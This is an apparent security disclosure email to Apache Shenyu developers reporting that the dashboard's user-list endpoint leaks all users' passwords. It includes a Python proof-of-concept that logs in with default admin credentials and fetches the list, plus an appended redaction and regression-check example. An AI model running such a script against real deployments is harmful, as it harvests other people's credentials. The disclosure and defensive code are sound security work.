Dear Developers of Apache Shenyu,

I am reaching out to you because, while reviewing your application, I found a
password leakage in the application.

It means that when a user requests the following URL,
"dashboardUser?currentPage=1&pageSize=12", the response discloses all
the passwords of the users.


It is not critical, as you need to be authenticated, but it is still a bad
practice.

I have attached a Python script to reproduce the issue. You need to set the
information (host, username & password) to use it.

Feel free to reach me should you have questions.

Regards,

Gregory
-- 
Grégory Draperi

import json
import requests

# Silence urllib3 TLS warnings in case the target is served over HTTPS with a self-signed cert.
requests.packages.urllib3.disable_warnings()


if __name__ == '__main__':
    print("start")
    # Set these to the Shenyu admin host and credentials before running.
    url = "http://127.0.0.1:9095"
    username = "admin"
    password = "123456"

    # Log in and pull the access token out of the JSON response.
    payload = {"userName": username, "password": password}
    r = requests.get(url + "/platform/login", params=payload)
    token = json.loads(r.text)['data']['token']
    print(token)

    # Fetch the user list with the token; the response body contains the users' passwords.
    headers = {'X-Access-Token': token}
    r2 = requests.get(url + '/dashboardUser?currentPage=1&pageSize=12', headers=headers)
    print(r2.text)
    print("end")
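As an added example that is not part of this report or of Shenyu's own code: a regression check that walks a JSON response body and reports any credential field it still carries, next to the server-side redaction that fixes the leak by stripping those fields before serialisation. The sample response body is constructed for the example and does not reflect Shenyu's real schema; the function names are assumptions.

```python
import json
from typing import Any, List

# Constructed stand-in for a paginated user-list response, shaped like the
# bug in the report. It is NOT the real Shenyu response schema.
SAMPLE_RESPONSE = json.dumps({
    "code": 200,
    "message": "query success",
    "data": {
        "dataList": [
            {"id": "1", "userName": "admin", "password": "$2a$10$constructedhash", "role": 1},
            {"id": "2", "userName": "alice", "password": "constructed-plaintext", "role": 0},
        ],
        "page": {"currentPage": 1, "pageSize": 12, "totalCount": 2},
    },
})


def _is_sensitive_key(key: str) -> bool:
    """True when a key names a credential: contains 'password' (any case) or a common alias."""
    k = key.lower()
    return "password" in k or k in {"passwd", "pwd", "secret"}


def find_sensitive_fields(obj: Any, path: str = "$") -> List[str]:
    """Walk a decoded JSON body; return JSON paths of every non-empty credential field."""
    hits: List[str] = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}"
            if _is_sensitive_key(key) and value not in (None, ""):
                hits.append(child)
            else:
                hits.extend(find_sensitive_fields(value, child))
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            hits.extend(find_sensitive_fields(item, f"{path}[{i}]"))
    return hits


def redact_sensitive_fields(obj: Any) -> Any:
    """Server-side fix: deep copy with credential fields dropped before serialisation."""
    if isinstance(obj, dict):
        return {k: redact_sensitive_fields(v) for k, v in obj.items() if not _is_sensitive_key(k)}
    if isinstance(obj, list):
        return [redact_sensitive_fields(v) for v in obj]
    return obj


def check_response_body(body: str) -> List[str]:
    """Regression check for the report: leaking paths, empty when the body is clean."""
    return find_sensitive_fields(json.loads(body))


def redact_response_body(body: str) -> Any:
    """Decode a body and return its redacted form (what the endpoint should have sent)."""
    return redact_sensitive_fields(json.loads(body))
```

Pointing check_response_body at the real /dashboardUser response from the script above turns the report into a test that fails until the field is gone.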
